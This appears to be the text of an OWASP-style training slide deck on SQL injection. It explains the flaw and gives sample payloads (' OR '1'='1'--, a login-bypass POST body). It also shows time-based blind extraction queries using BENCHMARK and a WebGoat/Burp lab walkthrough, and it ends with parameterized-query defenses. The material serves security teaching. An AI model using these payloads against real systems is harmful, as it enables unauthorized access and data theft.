8. Agenda
• Business risk of SQL Injection
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
9. Fundamental Problem
• User controlled data improperly used with SQL statements
• Example Vulnerable Query:
sqlQ = “Select user from UserTable where name= '+username
+ ' and pass = '+password+ ' ”
Login: ___
My username is o’malley ?
Pass: ____
10. Fundamental Problem
• User controlled data improperly used with SQL statements
• o’malley scenario
Select user from UserTable where name= 'o'malley' and pass = 'foo'
• Result: Error, syntax is not valid
Error: Invalid syntax
11. Agenda
• Business risk of SQL Injection
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
12. SQL Attack Examples
• Basic SQL Injection Tests:
OR 1=1 --
' OR '1'= '1'--
• Select user from UserTable where name= 'joe' and pass = ' ' OR '1'= '1'-- '
• Looks for username of joe and password of (blank || TRUE)
13. Variations
• SQL Injection
• Error message or different text returned based on SQL
statement results
• Example: Error message, db data displayed in page
• Blind SQL Injection
• No visible response to user indicating success of fail of
query
14. Blind SQL Injection
• Use time of results to deduce boolean
• Injected SQL uses IF statements and delays to enumerate
data, 1 char at a time
15. Blind SQL Examples
mysql> select * from example;
+----+-----------------+------+
| id | name | age |
+----+-----------------+------+
| 1 | Timmy Mellowman | 23 |
Text|
| 2 | Sandy Smith | 21
+----+-----------------+------+
2 rows in set (0.00 sec)
16. Blind SQL Examples
• mysql> SELECT IF( name = 'Sandy Smith',
BENCHMARK(1000000,MD5( 'x' )),NULL) FROM example;
• Command line result - 2 rows in set (5.25 sec)
• mysql> SELECT IF( name = 'Joe Bob',
BENCHMARK(1000000,MD5( 'x' )),NULL) FROM example;
• Command line result - 2 rows in set (0.00 sec)
• The actual data returned is not important the delay indicates
True of False
+----+-----------------+------+
| 1 | Timmy Mellowman | 23 |
| 2 | Sandy Smith | 21 |
+----+-----------------+------+
17. Blind SQL Injection
• mysql> select headerName from header_store UNION select
IF(SUBSTRING(name,
1,1)='T',BENCHMARK(1000000,MD5( 'x' )),'y') from example
where age=23 limit 1;
• 1 row in set (6.01 sec)
• Test if the first character of "name" from the example table
(where age=23) is the letter T.
+----+-----------------+------+
| 1 | Timmy Mellowman | 23 |
18. WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest
20. Using A Proxy
• Burp - Configure to listen on 8080
• Ensure “loopback only” is checked (will be by default)
21. Set Firefox Proxy
• Set Firefox proxy to 8080
• Preferences
-> Advanced
-> Network
-> Settings
• Set HTTP Proxy
• Important - clear
“No Proxy for” line
22. Confirm Setup Works
• Refresh Web Browser - it should hang
• Go to Burp -> Proxy -> Intercept (they are highlighted)
• Click “Forward” for all messages
• Should now see page in browser
23. Confirm Setup Works
• Intercept is on
• Each request will be caught by proxy
• Requires you to hit forward each time
• Intercept is off
• Requests sent through proxy automatically
• Logged in tab “proxy”->”history”
24. “Hello World” of Proxies
• Lesson: General->Http Basic
• Objective:
• Enter your name into text box
• Intercept with proxy & change entered name to different
value
• Receive response & observe modified value is reversed
Joe Sue
Attacker’s euS euS
Web Proxy Web Server
Browser
25. SQL Injection
• Problem: User controlled data improperly used with SQL
statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests:
OR 1=1 --
' OR '1'= '1'--
• Example Vulnerable Query:
sqlQ = “Select user from UserTable where name= '+username+
' and pass = '+password+ ' ”
27. SQL Injection
• Lesson: Injection Flaws -> Lab: SQL Injection -> Stage
1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting
“control” characters. Login as “Neville” w/o
knowledge of the password
28. SQL Injection
• HTTP Post
employee_id=112&password=x' OR '1'='1&action=Login
• Vulnerable SQL
Select user from UserTable where name= '+username+ ' and
pass = '+password+ '
Select user from UserTable where name= '112' and
pass = 'x' OR '1'='1'
• Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
29. Agenda
• Business risk of SQL Injection
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
30. SQL Injection
• Parameterized Queries
No confusion with control characters
• Input Validation
Are special characters needed for most fields?
What about non-printable characters %00-%0A?
Just a layer of defense - remember o’malley example
31. Parameterized Query
• HTTP Post
employee_id=112&password=x' OR '1'='1&action=Login
• Parameterized Query
Look for employee_id 112 with password of x' OR '1'='1
• Result: Login fail - password is foo not x' OR '1'='1
32. Language Examples
• User data + string concatenation == SQL injection disaster
• DJANGO
• Model Query API-> Safe
• raw() manager -> Dangerous, Avoid!
• Java
String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( );
34. Questions
• Next Events
• Aug 24 - CEF Logging for Attack Aware Applications
• Aug 25 - OWASP Bay Area Chapter Meeting
• https://wiki.mozilla.org/index.php?
title=WebAppSec#Schedule